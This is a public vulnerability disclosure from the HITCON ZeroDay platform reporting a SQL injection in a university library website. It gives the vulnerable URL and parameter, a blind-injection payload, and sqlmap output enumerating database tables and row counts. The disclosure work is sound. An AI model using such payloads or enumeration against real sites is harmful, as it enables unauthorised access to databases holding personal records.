Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2018-00406
- Vendor: 聖約翰科技大學
- Title: 圣约翰科技大学某站SQL
- Introduction: 圣约翰科技大学图书馆SQL
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2018/04/06 23:51:20 : 新提交 (由 Cra5h 更新此狀態)
- 2018/04/07 00:27:43 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/04/07 20:09:09 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/04/07 20:09:10 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/05/29 22:35:48 : 複測申請中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/06/16 03:00:22 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2018-00406
- 通報者:cra5h (Cra5h)
- 風險:高
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
相關網址
敘述
圣约翰科技大学图书馆SQL
SQL位置:
http://www.lib.sju.edu.tw/newshow.asp?news_id=1780
news_id参数过滤不严导致SQL产生
sqlmap resumed the following injection point(s) from stored session:
Parameter: news_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: news_id=1780 AND 9522=9522
[22:56:18] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft Access
[22:56:18] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.lib.sju.edu.tw'
确认影响库:(11库)
Database: Microsoft_Access_masterdb
[11 tables]
+------------+
| adm |
| admin |
| business |
| item |
| member |
| menu |
| service |
| singup |
| staff |
| statistics |
| userlist |
+------------+
[22:58:14] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3 times
[22:58:14] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.lib.sju.edu.tw'
查看数据量:
Database: Microsoft_Access_masterdb
+------------+---------+
| Table | Entries |
+------------+---------+
| member | 6878 |
| business | 5216 |
| staff | 662 |
| singup | 48 |
| statistics | 14 |
| service | 12 |
| admin | 9 |
| menu | 5 |
| item | 3 |
| userlist | 3 |
| adm | 1 |
+------------+---------+
[22:59:16] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3 times
[22:59:16] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.lib.sju.edu.tw'